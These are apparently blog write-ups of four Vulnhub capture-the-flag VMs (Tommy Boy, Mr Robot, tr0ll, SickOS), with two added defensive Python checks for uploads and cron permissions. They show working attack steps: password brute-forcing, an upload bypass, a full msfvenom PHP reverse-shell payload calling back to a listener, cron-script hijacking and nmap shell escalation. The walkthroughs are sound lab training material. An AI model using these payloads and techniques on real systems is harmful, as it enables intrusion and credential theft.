Tommy Boy: 1

Huge thanks to Brian Johnson for this fun VM.

Vulnhub

As usual we start with an nmap scan.

Every time I see a website I run dirb and nikto on it, but the first thing I check is the robots.txt.

From the robots.txt we can see:

/flag-numero-uno.txt

Browsing to the url http://192.168.0.102/flag-numero-uno.txt

This is the first of five flags in the Callhan Auto server. You'll need them all to unlock
the final treasure and fully consider the VM pwned!

Flag data: B34rcl4ws

Checking the Webpage

Checking the source code of the page reveals an interesting YouTube video.

Watching the YouTube video reveals the words "prehistoric forest".

We can try to fetch http://192.168.0.102/prehistoricforest/
This is a WordPress server!

From manually enumerating the site we can see there is a protected post that requires a password set by Richard:

Richard, what’s the password you put on that protected blog post?

Also, it's WordPress, so let's check whether there are any vulnerabilities.

So we run wpscan on it.

Enumeration shows some users, and we can try to brute-force their passwords.

wpscan -u 192.168.0.102/prehistoricforest/ --enumerate u

[+] Identified the following 4 user/s:
+----+----------+-------------------+
| Id | Login    | Name              |
+----+----------+-------------------+
| 1  | richard  | richard           |
| 2  | tom      | Big Tom           |
| 3  | tommy    | Tom Jr.           |
| 4  | michelle | Michelle Michelle |
+----+----------+-------------------+

wpscan -u 192.168.0.102/prehistoricforest/ --username tom --wordlist /usr/share/wordlists/rockyou.txt

Brute-forcing the user tom gives the password tomtom1.

On the WordPress site there is flag #2, thisisthesecondflagyayyou.txt:

curl http://192.168.0.102/prehistoricforest/thisisthesecondflagyayyou.txt
You've got 2 of five flags - keep it up!

Flag data: Z4l1nsky

 

From enumerating the WordPress site we can see that Tom left himself a message to help remember his password,

so we know the second part of his SSH password.

I used these commands to generate a list of candidate passwords; since I didn't know the password's length, I would otherwise have had to generate the whole wordlist by hand.

crunch 9 9 -t '@@@1938!!' -o tommy.txt
hydra -l tom -P tommy.txt 192.168.0.102 ssh -V

While this was brute-forcing the user tom over SSH, I enumerated WordPress further.

There was a reference to the richard directory on the website, which had a picture of Richard:

http://192.168.0.102/prehistoricforest/richard/

Running exiftool on the shockedrichard image revealed:

User Comment : ce154b5a8e59c89732bc25d6a2e6b90b

A quick Google search for this hash revealed the password is spanky.

There was a WordPress post that needed a password to be seen. When I tried spanky, the following post was readable:

Michelle/Tommy,

This is f’d up. I am currently working to restore the company’s online ordering system, but we are having some problems getting it restored from backup. Unfortunately, only Big Tom had the passwords to log into the system. I can’t find his passwords anywhere. All I can find so far is a note from our IT guy Nick (whose last day was yesterday) saying:

Hey Richy,

So you asked me to do a write-up of everything I know about the Callahan server so the next moron who is hired to support you idiots can get up to speed faster. Here’s everything I know:

You guys are all hopeless sheep :-/ The Callahan Auto Web site is usually pretty stable. But if for some reason the page is ever down, you guys will probably go out of business. But, thanks to *me* there’s a backup called callahanbak.bak that you can just rename to index.html and everything will be good again. IMPORTANT: You have to do this under Big Tom’s account via SSH to perform this restore. Warning: Big Tom always forgets his account password. Warning #2: I screwed up his system account when I created it on the server, so it’s not called what it should be called. Eh, I can’t remember (don’t care) but just look at the list of users on the system and you’ll figure it out.

I left a few other bits of information in my home folder, which the new guy can access via FTP. Oh, except I should mention that the FTP server is super flaky and I haven’t had the time (i.e. I don’t give a fat crap) to fix it. Basically I couldn’t get it running on the standard port, so I put it on a port that most scanners would get exhausted looking for. And to make matters more fun, the server seems to go online at the top of the hour for 15 minutes, then down for 15 minutes, then up again, then down again. Now it’s somebody else’s problem (did I mention I don’t give a rat’s behind?).

You asked me to leave you with my account password for the server, and instead of laughing in your face (which is what I WANTED to do), I just reset my account (“nickburns” in case you’re dumb and can’t remember) to a very, VERY easy to guess password. I removed my SSH access because I *DON’T* want you calling me in case of an emergency. But my creds still work on FTP. Your new fresh fish can connect using my credentials and if he/she has half a brain.

Good luck, schmucks!

LOL

-Nick

 

Michelle/Tommy…WTF are we going to do?!?! If this site stays down, WE GO OUT OF BUSINESS!!!1!!1!!!!!!!

-Richard

From the earlier scan we know there is a service on port 8008; it is Nick's web server.

We can now fetch http://192.168.0.102:8008/NickIzL33t/

But on this page there is nothing but a hint ("Only me and Steve Jobs can see this content").

So I changed my User-Agent to something Apple-related (I used a Firefox add-on for convenience, but I tested the User-Agent with Burp Suite):

Apple-iPhone/501.347

With this User-Agent I managed to fetch the NickIzL33t page, only to be told I would need to know the name of a page ending in .html.

So I fired up DirBuster to find the .html page, but DirBuster kept crashing with the rockyou.txt wordlist.
So I used Burp Suite to brute-force the .html name instead, and found that the hidden page is fallon1.html.

From there we can download the hint for cracking the zip file, the zip file itself and the 3rd flag:

http://192.168.0.102:8008/NickIzL33t/flagtres.txt

THREE OF 5 FLAGS - you're awesome sauce.

Flag data: TinyHead

Checking the source we can see there is a link to an image upload page:

http://192.168.0.102:8008/NickIzL33t/P4TCH_4D4MS/upload.php

If we just rename our PHP file to .gif we can upload it directly to the server and get code execution 🙂
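The bypass above works because the upload handler trusts the file extension alone. As an added example that is not part of the original write-up or of the VM, here is how a defender validates an upload: sniff the content's magic bytes, require them to match the claimed extension, refuse script markers hidden inside an otherwise valid image (a GIF header followed by PHP), and store the file under a server-chosen name. The sample uploads are constructed.

```python
import secrets
from typing import Dict, Optional, Tuple

# Magic-byte prefixes for the image types this handler accepts.
IMAGE_MAGIC = {
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
}
# Extensions the form may carry and the content type each one must match.
ALLOWED_EXT = {"gif": "gif", "png": "png", "jpg": "jpg", "jpeg": "jpg"}
# Markers that must never appear in something claiming to be an image.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script", b"<%")


def sniff_image_type(data: bytes) -> Optional[str]:
    """Identify the image type from the leading bytes, ignoring the filename."""
    for magic, kind in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def validate_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason or sniffed type). The extension alone is never trusted."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXT:
        return False, "extension not allowed"
    kind = sniff_image_type(data)
    if kind is None:
        return False, "content is not a recognised image"
    if ALLOWED_EXT[ext] != kind:
        return False, "extension does not match content"
    # A valid GIF header followed by PHP is still a polyglot; refuse it.
    lowered = data.lower()
    if any(marker in lowered for marker in SCRIPT_MARKERS):
        return False, "script marker inside image"
    return True, kind


def storage_name(kind: str) -> str:
    """Server-chosen name: random token plus the sniffed type, nothing from the client."""
    return f"{secrets.token_hex(16)}.{kind}"


# Constructed sample uploads: a real GIF header, a renamed PHP file, a polyglot, a mismatch.
SAMPLES = {
    "cat.gif": b"GIF89a" + b"\x01\x00\x01\x00\x00\x00\x00;",
    "shell.gif": b"<?php echo 'not an image'; ?>",
    "poly.gif": b"GIF89a" + b"<?php echo 'still not an image'; ?>",
    "logo.gif": b"\x89PNG\r\n\x1a\n" + b"\x00" * 8,
}


def check_samples() -> Dict[str, Tuple[bool, str]]:
    """Run every constructed sample through the validator."""
    return {name: validate_upload(name, data) for name, data in SAMPLES.items()}
```

Serving the stored files from a directory where the web server has script execution disabled closes the remaining gap even if a check is ever bypassed.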

To crack the zip file found earlier:

crunch 13 13 -t bev,%%@@^1995 -o tomwlist.txt

This creates a wordlist matching the description in Nick's hint.

fcrackzip -D -p ./Nick/tomwlist.txt -u t0msp4ssw0rdz.zip -v

Unzipping it gives us a file passwords.txt containing:

Sandusky Banking Site
------------------------
Username: BigTommyC
Password: money

TheKnot.com (wedding site)
---------------------------
Username: TomC
Password: wedding

Callahan Auto Server
----------------------------
Username: bigtommysenior
Password: fatguyinalittlecoat

Note: after the "fatguyinalittlecoat" part there are some numbers, but I don't remember what they are.
However, I wrote myself a draft on the company blog with that information.

Callahan Company Blog
----------------------------
Username: bigtom(I think?)
Password: ???
Note: Whenever I ask Nick what the password is, he starts singing that famous Queen song.

Since we already know the second part of the password, "1938!!" (from the WordPress post),

we can log in as bigtommysenior with the password "fatguyinalittlecoat1938!!":

ssh bigtommysenior@192.168.0.102 (password = fatguyinalittlecoat1938!! )

Once logged in over SSH:

cat el-flag-numero-quatro.txt
YAY! Flag 4 out of 5!!!! And you should now be able to restore the Callhan Web server to normal
working status.

Flag data: EditButton

But...but...where's flag 5?

I'll make it easy on you. It's in the root of this server at /5.txt

I quickly checked whether my user had access, but the file is owned by www-data. Since I had already uploaded a PHP file through the image upload bypass, I already had a shell as www-data 🙂

 

cat /5.txt
FIFTH FLAG!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
YOU DID IT!!!!!!!!!!!!!!!!!!!!!!!!!!!!
OH RICHARD DON'T RUN AWAY FROM YOUR FEELINGS!!!!!!!!

Flag data: Buttcrack

Ok, so NOW what you do is take the flag data from each flag and blob it into one big chunk.
So for example, if flag 1 data was "hi" and flag 2 data was "there" and flag 3 data was "you"
you would create this blob:

hithereyou

Do this for ALL the flags sequentially, and this password will open the loot.zip in Big Tom's
folder and you can call the box PWNED.

So we just need to concatenate all flags 🙂

1st Flag : B34rcl4ws # From robots.txt
2nd Flag : Z4l1nsky # From WordPress
3rd Flag : TinyHead # From Nick’s web service
4th Flag : EditButton # From SSH
5th Flag : Buttcrack # From getting a shell as www-data

So the password for LOOT.zip should be:

B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack

unzip LOOT.ZIP
Archive: LOOT.ZIP
[LOOT.ZIP] THE-END.txt password:
inflating: THE-END.txt
bigtommysenior@CallahanAutoSrv01:~$ cat THE-END.txt
YOU CAME.
YOU SAW.
YOU PWNED.

Thanks to you, Tommy and the crew at Callahan Auto will make 5.3 cajillion dollars this year.

GREAT WORK!

I'd love to know that you finished this VM, and/or get your suggestions on how to make the next
one better.

Please shoot me a note at 7ms @ 7ms.us with subject line "Here comes the meat wagon!"

Or, get in touch with me other ways:

* Twitter: @7MinSec
* IRC (Freenode): #vulnhub (username is braimee)

Lastly, please don't forget to check out www.7ms.us and subscribe to the podcast at
bit.ly/7minsec

Thanks and have a blessed week!

-Brian Johnson
7 Minute Security

Fun VM

What I learned:
1. I learned some new options in DirBuster for brute-forcing only .html files and adding a User-Agent.
2. I learned how to use crunch efficiently to generate a custom wordlist that fits my needs.
3. I learned how to use Burp Suite as a brute-forcer over which you have complete control.

Thank you for reading this!

Mr Robot

This is my write-up for the Mr Robot VM on Vulnhub.

Link To Vulnhub

As usual we start with a good old nmap scan 🙂

nmap 192.168.0.97 -A -p - -T5

Starting Nmap 7.12 ( https://nmap.org ) at 2016-07-01 20:00 EDT
Nmap scan report for linux (192.168.0.97)
Host is up (0.00051s latency).
Not shown: 65532 filtered ports
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open   ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03
MAC Address: 08:00:27:38:35:A7 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.1
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.51 ms linux (192.168.0.97)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.40 seconds

Checking the robots.txt revealed a dictionary and the first key:

User-agent: *
fsocity.dic
key-1-of-3.txt

curl 192.168.0.97/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9

wget 192.168.0.97/fsocity.dic

Because the dictionary has many duplicate entries, I sorted it and removed the duplicates:

cat fsocity.dic | sort -u > fsociety.lst

There is a web server running, so we start dirb and nikto to learn more about it.

We can see WordPress is running on the server.

wpscan -u http://192.168.0.97/ --wordlist /root/Dropbox/Vulnhub/MrRobot/fsocity.dic --username user 

I first tried the username user because the website says "welcome to user's wordpress".

Since that didn't work, I had to think about other users this WordPress might have. The VM is named Mr Robot and the main character of Mr Robot is called Elliot, so I tried that user as well.

wpscan -u http://192.168.0.97/ --wordlist /root/Dropbox/Vulnhub/MrRobot/fsociety.lst --username Elliot

Brute Forcing 'Elliot' Time: 00:02:54  (5636 / 11452) 49.21%  ETA: 00:03:00
  +----+--------+------+-----------+
  | Id | Login  | Name | Password  |
  +----+--------+------+-----------+
  |    | Elliot |      | ER28-0652 |
  +----+--------+------+-----------+

We can now log in to WordPress and change the content of 404.php to any PHP code of our liking.
I used this PHP code, generated by msfvenom:


/*<?php /**/ error_reporting(0); $ip = '192.168.0.181'; $port = 443; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } elseif (($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } elseif (($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } else { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; eval($b); die();

curl 192.168.0.97/404.php

This gives a shell as the user daemon.

With the shell we can see the user robot's home directory, /home/robot:
ls -larth
total 16K
drwxr-xr-x 3 root root 4.0K Nov 13 2015 ..
drwxr-xr-x 2 root root 4.0K Nov 13 2015 .
-r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
robot@linux:~$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
A quick Google search for the hash gives us http://md5cracker.org/decrypted-md5-hash/c3fcd3d76192e4007dfb496cca67e13b

So we can switch user with su robot;
the password is abcdefghijklmnopqrstuvwxyz.

From enumerating the system we find the WordPress config file, which contains the database password as well as the FTP user and password. First the FTP settings:
define('FS_METHOD', 'ftpext');
define('FTP_BASE', '/opt/bitnami/apps/wordpress/htdocs/');
define('FTP_USER', 'bitnamiftp');
define('FTP_PASS', 'inevoL7eAlBeD2b5WszPbZ2gJ971tJZtP0j86NYPyh6Wfz1x8a');
define('FTP_HOST', '127.0.0.1');
define('FTP_SSL', false);

and the database configuration:

/** The name of the database for WordPress */
define('DB_NAME', 'bitnami_wordpress');

/** MySQL database username */
define('DB_USER', 'bn_wordpress');

/** MySQL database password */
define('DB_PASSWORD', '570fd42948');

/** MySQL hostname */
define('DB_HOST', 'localhost:3306');

With the FTP user I could read and write files as that user, but that didn't help me get a root shell, even though there is a crontab running as the bitnami user.

What finally got me the root shell: I realized I was running nmap as a non-root user, but nmap still ran as root (so the binary must be setuid root)!
nmap has an interactive option that can give you a shell. To get it just type:

nmap --interactive
!sh
There we got the root shell! 🙂

cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
# whoami
whoami
root

Thank you for reading this 🙂

nmap is installed on the box and the user robot is allowed to scan with it, so I did a bunch of local scans and discovered an FTP service running on the box.

nc -v 127.0.0.1 21
nc -v 127.0.0.1 21
Connection to 127.0.0.1 21 port [tcp/ftp] succeeded!
220 (vsFTPd 3.0.2)
USER bitnamiftp
USER bitnamiftp
331 Please specify the password.
PASS inevoL7eAlBeD2b5WszPbZ2gJ971tJZtP0j86NYPyh6Wfz1x8a
PASS inevoL7eAlBeD2b5WszPbZ2gJ971tJZtP0j86NYPyh6Wfz1x8a
230 Login successful.
CWD bitnami
CWD bitnami
250 Directory successfully changed.
CWD stats
CWD stats
550 Failed to change directory.
CWD /opt/bitnami/stats
CWD /opt/bitnami/stats
250 Directory successfully changed.
PASV
PASV
227 Entering Passive Mode (127,0,0,1,41,198).
LIST -l
LIST -l
150 Here comes the directory listing.
226 Directory send OK.
STOR ./agent.bin
STOR ./agent.bin
425 Use PORT or PASV first.
PASV
PASV
227 Entering Passive Mode (127,0,0,1,138,47).
STOR /opt/bitnami/stats/agent.bin
STOR /opt/bitnami/stats/agent.bin
425 Failed to establish connection.

PASV
PASV
227 Entering Passive Mode (127,0,0,1,34,208).
STOR /opt/bitnami/stats/agent.bin
STOR /opt/bitnami/stats/agent.bin
150 Ok to send data.
226 Transfer complete.
421 Timeout.
nc -v 127.0.0.1 35375 < /tmp/vipermeter.elf
# This transfers vipermeter.elf into agent.bin, which the crontab executes every hour at 55 minutes past.

To get a shell as root:
nmap --interactive
!sh

tr0ll

Okay, this is a new box, so we need to run nmap on it 🙂
There are three ports open: 21, 22 and 80.
The website just trolls us.
The FTP server allows anonymous reads, so we can check whether there is something there.
There is a file named lol.pcap. This is interesting.
The pcap shows someone connecting to the FTP server and downloading super_secret.txt.
Since the FTP protocol is not encrypted we can see the content of the downloaded file 🙂

In Wireshark just go to Statistics > Conversations > TCP.
You can see there are 4 TCP conversations; the one we are interested in is the 3rd.

This gives us the content of the file:
Well, well, well, aren’t you just a clever little devil, you almost found the sup3rs3cr3tdirlol 😛

Sucks, you were so close… gotta TRY HARDER!
We need to find the sup3rs3cr3tdirlol.
Just browse to http://192.168.0.59/sup3rs3cr3tdirlol/
You can download a 32-bit executable named roflmao there and run it.
When the program is run it prints out this: Find address 0x0856BF to proceed
This would normally be a memory address, but since we can't read memory on the target it must be something else.
It could be a browser address!
Browsing to http://192.168.0.59/0x0856BF/
gives us 2 folders: Good_luck and this_folder_contains_the_password.
The first gives us a list of usernames:
maleus
ps-aux
felux
Eagle11
genphlux <-- Definitely not this one
usmc8892
blawrg
wytshadow
vis1t0r
overflow

The second gives us a file named Pass.txt containing Good_job_:).
Since this is a troll machine we need to take this literally: the folder "contains the password", and the file it contains is named Pass.txt.
I created two files, one with the list of users and one with a list of passwords.

hydra -L user -P password -V 192.168.0.59 ssh -t 1

Brute-forcing with hydra we found the real SSH login was overflow // Pass.txt
[22][ssh] host: 192.168.0.59 login: overflow password: Pass.txt
Now we need to do a lot of enumeration. The best guide I have is from g0tmi1k:
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
By checking all the config files, I finally came across something that looked strange.
In /lib/log there is a file named cleaner.py; this is why our files in /tmp keep getting deleted.
But this file is writable by anyone, and root executes it periodically to clean the /tmp directory!
I used this Python reverse shell to get a shell as root:
https://www.trustedsec.com/files/RevShell_PoC_v1.py
I just replaced cleaner.py with this script to get a root reverse shell 😛
You just need to listen for the incoming connection like this:

nc -lnvp 443
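cleaner.py was dangerous because root ran it from cron while anyone could rewrite it. As an added example that is not part of the original write-up, this audit pulls the script paths out of system crontab lines and reports any that a non-root user could modify (the same check would have flagged the bitnami-owned agent.bin on Mr Robot had it been run by root); demo() builds a constructed copy of the misconfiguration in a temporary directory rather than touching the real /lib/log.

```python
import os
import stat
import tempfile
from typing import Dict, List


def script_paths_from_crontab(text: str) -> List[str]:
    """Pull absolute paths out of system crontab lines (m h dom mon dow user command)."""
    paths = []
    for line in text.splitlines():
        fields = line.split()
        if not fields or fields[0].startswith("#") or "=" in fields[0]:
            continue  # blank, comment, or VAR=value line
        for tok in fields[6:]:
            if tok.startswith("/"):
                paths.append(tok)
    return paths


def modifiable_by_non_root(path: str) -> List[str]:
    """Reasons a root-executed script could be changed by an unprivileged user."""
    reasons = []
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return ["target missing: whoever can create it controls what root runs"]
    if st.st_mode & stat.S_IWOTH:
        reasons.append("file is world-writable")
    if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
        reasons.append("file is writable by a non-root group")
    if st.st_uid != 0:
        reasons.append("file is not owned by root")
    parent = os.stat(os.path.dirname(path) or "/")
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        reasons.append("parent directory is world-writable without the sticky bit")
    return reasons


def audit_crontab(text: str) -> Dict[str, List[str]]:
    """Map each cron-run script that has a problem to the list of problems found."""
    findings = {}
    for path in script_paths_from_crontab(text):
        reasons = modifiable_by_non_root(path)
        if reasons:
            findings[path] = reasons
    return findings


def demo() -> Dict[str, List[str]]:
    """Constructed reproduction of the tr0ll layout inside a temp dir (not /lib/log)."""
    base = tempfile.mkdtemp()
    cleaner = os.path.join(base, "cleaner.py")
    rotate = os.path.join(base, "rotate.sh")
    for p in (cleaner, rotate):
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\n")
    os.chmod(cleaner, 0o666)  # anyone can rewrite it, as on the box
    os.chmod(rotate, 0o755)   # the way a root-run script should look
    crontab = f"SHELL=/bin/sh\n# constructed\n*/2 * * * * root python {cleaner}\n0 * * * * root {rotate}\n"
    return audit_crontab(crontab)
```

Run against the real /etc/crontab and the files in /etc/cron.d, the same function shows whether any root job depends on a file that unprivileged users can change.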

Since you are root you can read the content of /root/proof.txt:
Good job, you did it!
702a8c18d29c6f3ca0d99ef5712bfbdc

SickOS

I hacked the SickOS VM on vulnhub.com; here is how I did it.

I started with an nmap scan of the box.

There is a Squid proxy running on the box.
Squid is a proxy server, so let's configure our browser to go through it.
Once the proxy is set you can browse to the real website at http://192.168.101.229/. The reason for this is that the website is not reachable from the outside; by using the box's own proxy we can reach the web server.

http://192.168.101.229/robots.txt
In the robots.txt there is a directory called /wolfcms/.
Naturally we check Exploit-DB for a vulnerable version to help us attack the system.
Exploit-DB Exploit
From there I saw the path to the admin web panel:
"GET {$path}/?/admin/plugin/file_manager HTTP/1.1\r\n";
So we browse to http://192.168.101.229/wolfcms/?/admin/
We are presented with a login page.
I googled the default password for Wolf CMS, which is admin // admin.
In the web application there is a way to upload a file.

Let's generate a PHP meterpreter so that we have shell access on the system:

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.101.3 LPORT=443 -o phpmeter.php

If we upload phpmeter.php,
we can fetch it at http://192.168.101.229/public/phpmeter.php
This gives us a reverse shell as www-data.

python -c 'import pty;pty.spawn("/bin/bash")'

From this shell we can read the web server's configuration, including the root password for MySQL.
In /var/www/wolfcms/config.php we can see the database configuration:

// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');

So the root password for the database is john@123.
By doing some enumeration on the system we can see there is an additional user named sickos; we can read /etc/passwd or ls /home/ to find it.
People tend to reuse their passwords, so we can try to log in as the sickos user:
su sickos with the password john@123
Since the person who created this wasn't careful about security, this is the default account he created, and by default the main account is a member of sudoers.
This means we can run any command as root on the system.
We can verify whether we are in the sudoers group with this command:

sudo -l

User sickos may run the following commands on this host:
(ALL : ALL) ALL

This means we can switch to the root account with the password john@123:
sudo su gives us a shell as root!

cat /root/a0216ea4d51874464078c618298b1367.txt

'If you are viewing this!!

ROOT!

You have Succesfully completed SickOS1.1.
Thanks for Trying